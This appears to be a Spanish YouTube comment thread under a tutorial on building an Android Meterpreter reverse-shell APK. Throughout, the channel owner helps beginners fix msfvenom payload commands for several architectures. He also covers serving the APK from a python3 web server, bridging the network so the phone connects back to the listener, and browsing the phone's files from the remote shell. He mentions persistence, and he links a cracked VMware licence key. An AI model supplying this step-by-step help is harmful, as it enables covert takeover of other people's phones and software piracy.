hola tengo una duda y es que soy nuevo en el tema de cibersecurity y pues no se como solucionarlo y es que no me deja pasar la apk al escritorio y estaba intentando pasarla asi (msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 -o /home/kali/Desktop/virus.apk) pero me dice que no encuentra el archivo o el directorio
buenas noches, una consulta cuando ya creo la apk y la instalo en el dispositivo me dice que la version del android es antigua y no conecta con kali linux, como puedo hacerpara que sea compatible?
Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.
Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.
@@EduardoMedina-f1g Pues a ver puede ser que sea tambien por la arquitectura que tenga el móvil, te puedo dar unos cuantos comandos a probar si fuera de la arquitectura, por que el payload utilizado deberia de ser compatible con cualquier version de android: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm64 msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86 msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86_64 A ver si con esto te puede ser de ayuda, me vas diciendo.
Pues de Android en ese entorno me pillas flojo, pero se puede si tiene por así decirlo la opción activada del usuario "admin" o "root" que explico en el vídeo, una vez que la tiene activada se que se puede escalar, pero tendría que investigar eso jaja
Una pregunta cuando abro la app en mi celular me dice que esa app fue hecha para una versión anterior de android, mi android es version 10 como lo hago para que cuando este creando el apk en kali linux lo haga para la version 10 de android?
Para que funcione en versiones más modernas en móviles se tiene que utilizar otro tipo de herramientas para que funcione mejor, no sé si habrá algún exploit en el que soporte android 10 puede ser que lo haya, pero es lo que digo para esas cosas es mejor utilizar herramientas más sofisticadas jaja
@@anonimusking6822 A ver con la propia herramienta de metasploit se puede hacer, utilizando otro payload o alguno que soporte android 10 o 13, de otras herramientas no te sabría decir, se que las hay, pero no sé cuáles, aún así utilizo un android antiguo para no meterme en problemas legales de vulnerar un android más moderno, me entiendes?? Jaja
@@MaykelMillan-dk4tm pues a ver pueden ser muchas cosas, que a lo mejor la IP o el puerto no esté bien configurado de msfvenom, revisa el adaptador de red que esté en modo puente y que coja la red del wifi (wlan), revisa que la configuración del multi handler este con la IP y puerto iguales qje con msfvenom.
Comprueba que lo estás haciendo bien, por qué sigue funcionando, sólo que en dispositivos más nuevos a lo mejor puede dar algún fallo, pero una reverse Shell es muy raro que falle sólo que tienes que meter una que se adapte al dispositivo
@@anonimusanon-c3bSi es lo que dije, que dependiendo se puede o a veces da fallos, pero como verás se puede en la mayoría de dispositivos, tengo un vídeo más nuevo hablando de esto pero en ordenadores y de forma más profesional jaja
@@iradama3451 Por que a lo mejor no estan almacenados ahi los archvos de tu dispositivo, pero dentro de ese entorno puede crear carpetas y mover los archivos a ese entorno, que es lo que hacia yo. Solo que es depende del movil tambien te digo.
@@iradama3451Yo encantado, sólo que es lo que digo, que es depende del móvil, tienes que estar explorando con la terminal el móvil entero desde la Shell remota hasta que encuentres la carpeta en la que estén todas las cosas del móvil, ojalá poder decirte dónde pero es muy depende del móvil y tampoco estoy muy especializado en móviles 🥲
Hola muy buen video, tengo un problema y es que cuando pongo la ip en google no me carga la página para poder descargar el archivo, mi ip es 10.0.2.15, uso virtualbox tiene algo que ver?
Sería raro que fuera de virtual box, pero si es verdad que si pasa eso es por qué alguna configuración de red no está bien, si te vas a la máquina kali o la que utilice y le configuras como adaptador puente (modo Bridge) te utilizará la dirección de red física de tu ordenador host, y así poder interconectarlos cuando metas la IP
@@Hacking_Communityvale muchas gracias ya eh podido solucionarlo, una duda cuando poner en escucha y utilizo el msf6 > use exploit/multi/handler me pone que no encuentra el comando,lo siento por tantas dudas pero es que soy nuevo😅
@@Nico-bb3dc Tranquilo por las preguntas no te preocupes, te entiendo jaja, pues si me puedes decir exactamente el error te podría decir de dónde viene, igualmente mira bien que lo estés poniendo todo correctamente, asegúrate de que estar realmente dentro de msfconsole y demás cosas, pero envíame el error y te ayudo jeje. Igualmente si a veces tienes problemas como estos yo lo que suelo hacer es investigar el error en internet o a veces preguntárselo a ChatGPT, que eso también ayuda a desarrollarte mucho en este mundo.
Hola bro, tu que kali linux usas? Lo digo porque soy nuevo en esto y a la hora de descargarmelo me salen varias opciones, me sale el installer images, virtual machines...
Pues si es verdad que aparecen unas cuantas, si no te quieres instalar Kali desde 0 con una ISO, te recomiendo que te descargues los que están preparados para una máquina virtual que son más rápidos, ya que el sistema ya está montado y sólo tienes que abrirlo con el hipervisor: www.kali.org/get-kali/#kali-virtual-machines Ahí te facilito lo que te comento jeje y a darle duro que por algo se empieza
@@Nico-bb3dc Te recomiendo VMWare, si quieres descargarte la versión 17 pro y en un repositorio de GitHub hay una key para iniciarlo gratis con licencia (Crackearlo) gist.github.com/PurpleVibe32/30a802c3c8ec902e1487024cdea26251 En ese respositorio la que pone (< worked for me!)
amigo al hacerlo me sale esto Error: No such file or directory @ rb_sysopen - /home/kali/Desktop/Programa.apk no encuentra el directorio y cuando labro una terminal en Desktop sale lo mismo ... k podra ser??
Pues eso es un error de que no encuentra el archivo seleccionado, compruebalo con el comando: sudo ls -l /home/kali/Desktop/Programa.apk O si no está ahí, pues haz un find para buscarlo por el sistema: sudo find /home/kali -name "Programa.apk" 2>/dev/null o sudo find / -name "Programa.apk" 2>/dev/null Y ya si no es nada de esto, tendrías que mirar los permisos, por si acaso hazlo en una sesión de root, así te quitas problemas muchas veces
No se a que te refieres exactamente pero asegurate de que cuando tienes el servidor de python3 abierto donde se encuentre la apk metas bien la IP con el puerto que corresponde y que sobre todo esten los dos dispositivos en la misma red wifi, poniendo la maquina victual en modo red puente
Si te refieres a la comunicación de que se pueda abrir una Shell cuando se ejecute el apk, si, tienen que estar en la misma red wifi, se puede hacer en distintas redes también, pero eso es mucho más avanzado y tedioso jaja
@@Tartarus_3es que eso ya roza un poco lo no ético y si hago algo así no sé considera estar en un entorno controlado, por lo que me tumbarian el vídeo lo más seguro jaja
@@Hacking_Community entiendo pero no te lo tumban si en todo momento aclaras que estas haciendo un experimento para fines de aprendizaje, hay muchas cosas no eticas que las pesonas defienden hoy en dia con su vida, si bien lo que enseñas es un arma de doble filo, algunos no la usaremos con fines malignos.
Asegúrate de que el servidor de python3 está bien puesto y que la IP también está bien puesta con su determinado puerto 8000 en tal caso de que no indicaras el puerto en el servidor de python3, por ejemplo.... $ python3 -m http.server URL = :8000/ o sin meter puerto que sería... $ python3 -m http.server 80 URL = / Y ya es asegurarte con un ifconfig que la IP está bien puesta y todo lo demás, espero que te haya servido de ayuda 🤙🏻
Buen video amigo, es verdad que por una imagen también pueden esconder el payload? Dicen que al abrir una imagen también se te puede colar un payload sin darte cuenta
Si eso también se puede hacer, es algo muy parecido a lo que hago para hacerme una Reverse Shell al móvil cuando se habre la aplicación desde el móvil, pues lo mismo pero con una imagen solo que de una manera mas diferente jaja
@@Hacking_Community jejejeje uy entonces hay que tener cuidado hasta con las imágenes que nos mandan 🥶 Gracias por tu conocimiento, ojalá puedas hacer un video explicándolo bro, saludos ✌🏽
hola tengo una duda y es que soy nuevo en el tema de cibersecurity y pues no se como solucionarlo y es que no me deja pasar la apk al escritorio y estaba intentando pasarla asi (msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 -o /home/kali/Desktop/virus.apk) pero me dice que no encuentra el archivo o el directorio
Eso significa que la ruta no es válida, por qué no encuentra el archivo, como si no existiera
buenas noches, una consulta cuando ya creo la apk y la instalo en el dispositivo me dice que la version del android es antigua y no conecta con kali linux, como puedo hacerpara que sea compatible?
Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.
Puess es que si es antigua, debería de utilizar otra herramienta u otro exploit que esté a corde a la versión del móvil, pero se supone que con móviles del 2014 para adelante debería de funcionar ese exploit.
@@Hacking_Community me puedes recomendar algun exploit? de todas formas voy a intentar nuevamente
@@EduardoMedina-f1g Pues a ver puede ser que sea tambien por la arquitectura que tenga el móvil, te puedo dar unos cuantos comandos a probar si fuera de la arquitectura, por que el payload utilizado deberia de ser compatible con cualquier version de android:
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a arm64
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -a x86_64
A ver si con esto te puede ser de ayuda, me vas diciendo.
@@Hacking_Community hola con estos exploit me da un error de compatibilidad payload
Lo explicas bien, da gusto 👍
Graciasss jeje, me alegro muchísimo 🫶🏻
Excelente saludos, una inquietud también es posible escalar privilegio en estos dispositivos.
Pues de Android en ese entorno me pillas flojo, pero se puede si tiene por así decirlo la opción activada del usuario "admin" o "root" que explico en el vídeo, una vez que la tiene activada se que se puede escalar, pero tendría que investigar eso jaja
Una pregunta cuando abro la app en mi celular me dice que esa app fue hecha para una versión anterior de android, mi android es version 10 como lo hago para que cuando este creando el apk en kali linux lo haga para la version 10 de android?
Para que funcione en versiones más modernas en móviles se tiene que utilizar otro tipo de herramientas para que funcione mejor, no sé si habrá algún exploit en el que soporte android 10 puede ser que lo haya, pero es lo que digo para esas cosas es mejor utilizar herramientas más sofisticadas jaja
@@Hacking_Community como cual me recomiendas bro?
@@anonimusking6822 A ver con la propia herramienta de metasploit se puede hacer, utilizando otro payload o alguno que soporte android 10 o 13, de otras herramientas no te sabría decir, se que las hay, pero no sé cuáles, aún así utilizo un android antiguo para no meterme en problemas legales de vulnerar un android más moderno, me entiendes?? Jaja
Buenos videos bro, yo tengo un problema pero no se si es la red, cuando pongo el metasploit a escuchar que le doy a la apk en el cell no hace nada
Ayudame bro , a se me olvido decir que uso linux en wsl2
@@MaykelMillan-dk4tm pues a ver pueden ser muchas cosas, que a lo mejor la IP o el puerto no esté bien configurado de msfvenom, revisa el adaptador de red que esté en modo puente y que coja la red del wifi (wlan), revisa que la configuración del multi handler este con la IP y puerto iguales qje con msfvenom.
eso ya no funciona lo eh probado en varios dispositivos android y nunca se genera la sesion de meterpreter cuando ejecutas la app
Comprueba que lo estás haciendo bien, por qué sigue funcionando, sólo que en dispositivos más nuevos a lo mejor puede dar algún fallo, pero una reverse Shell es muy raro que falle sólo que tienes que meter una que se adapte al dispositivo
@@Hacking_Community lo probe recien con una tablet itab de android 9.0 y funciono (la tablet es de un amigo y tengo concentimieto)
@@anonimusanon-c3bSi es lo que dije, que dependiendo se puede o a veces da fallos, pero como verás se puede en la mayoría de dispositivos, tengo un vídeo más nuevo hablando de esto pero en ordenadores y de forma más profesional jaja
Hola, estoy intentando acceder a los list files y no me aparece nada, podrias ayudarme con eso?
pongo ls y solo me aparece "oat"
@@iradama3451 Por que a lo mejor no estan almacenados ahi los archvos de tu dispositivo, pero dentro de ese entorno puede crear carpetas y mover los archivos a ese entorno, que es lo que hacia yo.
Solo que es depende del movil tambien te digo.
@@Hacking_Community no entiendo muy bien como hacerlo...
@@Hacking_Community me puedes enseñar por favor
@@iradama3451Yo encantado, sólo que es lo que digo, que es depende del móvil, tienes que estar explorando con la terminal el móvil entero desde la Shell remota hasta que encuentres la carpeta en la que estén todas las cosas del móvil, ojalá poder decirte dónde pero es muy depende del móvil y tampoco estoy muy especializado en móviles 🥲
Hola muy buen video, tengo un problema y es que cuando pongo la ip en google no me carga la página para poder descargar el archivo, mi ip es 10.0.2.15, uso virtualbox tiene algo que ver?
Sería raro que fuera de virtual box, pero si es verdad que si pasa eso es por qué alguna configuración de red no está bien, si te vas a la máquina kali o la que utilice y le configuras como adaptador puente (modo Bridge) te utilizará la dirección de red física de tu ordenador host, y así poder interconectarlos cuando metas la IP
@@Hacking_Communityvale muchas gracias ya eh podido solucionarlo, una duda cuando poner en escucha y utilizo el msf6 > use exploit/multi/handler me pone que no encuentra el comando,lo siento por tantas dudas pero es que soy nuevo😅
Oye bro@@Hacking_Community un video para ofuscar el payload estaria de aquellas, saludos buen tutorial
@@Nico-bb3dc Tranquilo por las preguntas no te preocupes, te entiendo jaja, pues si me puedes decir exactamente el error te podría decir de dónde viene, igualmente mira bien que lo estés poniendo todo correctamente, asegúrate de que estar realmente dentro de msfconsole y demás cosas, pero envíame el error y te ayudo jeje.
Igualmente si a veces tienes problemas como estos yo lo que suelo hacer es investigar el error en internet o a veces preguntárselo a ChatGPT, que eso también ayuda a desarrollarte mucho en este mundo.
@@NCIRECORDSsi se podría hacer, lo miraré bien y si puedo subo un vídeo respecto a ello 🤙🏻
Hola bro, tu que kali linux usas? Lo digo porque soy nuevo en esto y a la hora de descargarmelo me salen varias opciones, me sale el installer images, virtual machines...
Pues si es verdad que aparecen unas cuantas, si no te quieres instalar Kali desde 0 con una ISO, te recomiendo que te descargues los que están preparados para una máquina virtual que son más rápidos, ya que el sistema ya está montado y sólo tienes que abrirlo con el hipervisor:
www.kali.org/get-kali/#kali-virtual-machines
Ahí te facilito lo que te comento jeje y a darle duro que por algo se empieza
@@Hacking_Community Muchas gracias
Y de esas cual me recomiendas? La que más suelo ver es la de virtualbox
@@Nico-bb3dc Te recomiendo VMWare, si quieres descargarte la versión 17 pro y en un repositorio de GitHub hay una key para iniciarlo gratis con licencia (Crackearlo)
gist.github.com/PurpleVibe32/30a802c3c8ec902e1487024cdea26251
En ese respositorio la que pone (< worked for me!)
Holaa, tengo una duda, si se desinstala el apk, el hacker ya no podría hacer nada mas no?
Exacto, pero si ha creado una persistencia en los procesos, ya da igual que la desinstales o no, seguirá ahí aunque lo reinicies
amigo al hacerlo me sale esto
Error: No such file or directory @ rb_sysopen - /home/kali/Desktop/Programa.apk
no encuentra el directorio y cuando labro una terminal en Desktop sale lo mismo ... k podra ser??
Pues eso es un error de que no encuentra el archivo seleccionado, compruebalo con el comando:
sudo ls -l /home/kali/Desktop/Programa.apk
O si no está ahí, pues haz un find para buscarlo por el sistema:
sudo find /home/kali -name "Programa.apk" 2>/dev/null
o
sudo find / -name "Programa.apk" 2>/dev/null
Y ya si no es nada de esto, tendrías que mirar los permisos, por si acaso hazlo en una sesión de root, así te quitas problemas muchas veces
@@Hacking_Community muchas gracias lo he solucionado Gracias
@@moscomoa5348 Perfectoo, nadaa jeje
buen video pero no se ¿por que no me carga la pagina para instalar la apk ?
No se a que te refieres exactamente pero asegurate de que cuando tienes el servidor de python3 abierto donde se encuentre la apk metas bien la IP con el puerto que corresponde y que sobre todo esten los dos dispositivos en la misma red wifi, poniendo la maquina victual en modo red puente
@@Hacking_Community si todo lo que mencionas bien,pero lo hare desde el principio todo
@@lejendaryfortnite2058 Valee, pues cualquier cosa me dices y si te puedo ayudar en algo me comentas 🤙🏻
los dispositivos tienen que estar en la misma red oara que funcione? o da igual en que red
Si te refieres a la comunicación de que se pueda abrir una Shell cuando se ejecute el apk, si, tienen que estar en la misma red wifi, se puede hacer en distintas redes también, pero eso es mucho más avanzado y tedioso jaja
@@Hacking_Community puedes hacer un video haciendo eso? acceder de forma remota
@@Tartarus_3es que eso ya roza un poco lo no ético y si hago algo así no sé considera estar en un entorno controlado, por lo que me tumbarian el vídeo lo más seguro jaja
@@Hacking_Community entiendo pero no te lo tumban si en todo momento aclaras que estas haciendo un experimento para fines de aprendizaje, hay muchas cosas no eticas que las pesonas defienden hoy en dia con su vida, si bien lo que enseñas es un arma de doble filo, algunos no la usaremos con fines malignos.
@@Tartarus_3 Yaa, la cosa es que ya me tumbaron un video y eso que estaba en todo momento diciendo que era para fines eticos
sigue así maquina
Graciassss 🫶🏻
Es igual para iphone IOS?
Hay que utilizar otros payloads, pero la técnica es similar jaja
@@Hacking_Community tienes videos vulnerando ios ?
@@Hacking_Community por cierto buen video.
@@DanielLopez-vu1ki Que va lo siento, es que no tengo igualmente ningún sistema operativo IOS por casa jaja
@@DanielLopez-vu1kigraciass jeje
una consulta, cuando pongo en el dispositivo android la direccion ip no me carga nada... alguna solucion?
Asegúrate de que el servidor de python3 está bien puesto y que la IP también está bien puesta con su determinado puerto 8000 en tal caso de que no indicaras el puerto en el servidor de python3, por ejemplo....
$ python3 -m http.server
URL = :8000/
o sin meter puerto que sería...
$ python3 -m http.server 80
URL = /
Y ya es asegurarte con un ifconfig que la IP está bien puesta y todo lo demás, espero que te haya servido de ayuda 🤙🏻
Buen video amigo, es verdad que por una imagen también pueden esconder el payload?
Dicen que al abrir una imagen también se te puede colar un payload sin darte cuenta
Si eso también se puede hacer, es algo muy parecido a lo que hago para hacerme una Reverse Shell al móvil cuando se habre la aplicación desde el móvil, pues lo mismo pero con una imagen solo que de una manera mas diferente jaja
@@Hacking_Community jejejeje uy entonces hay que tener cuidado hasta con las imágenes que nos mandan 🥶
Gracias por tu conocimiento, ojalá puedas hacer un video explicándolo bro, saludos ✌🏽
@@nestorcharris6590 sii ya intentaré hacer algún vídeo explicando eso mejor jeje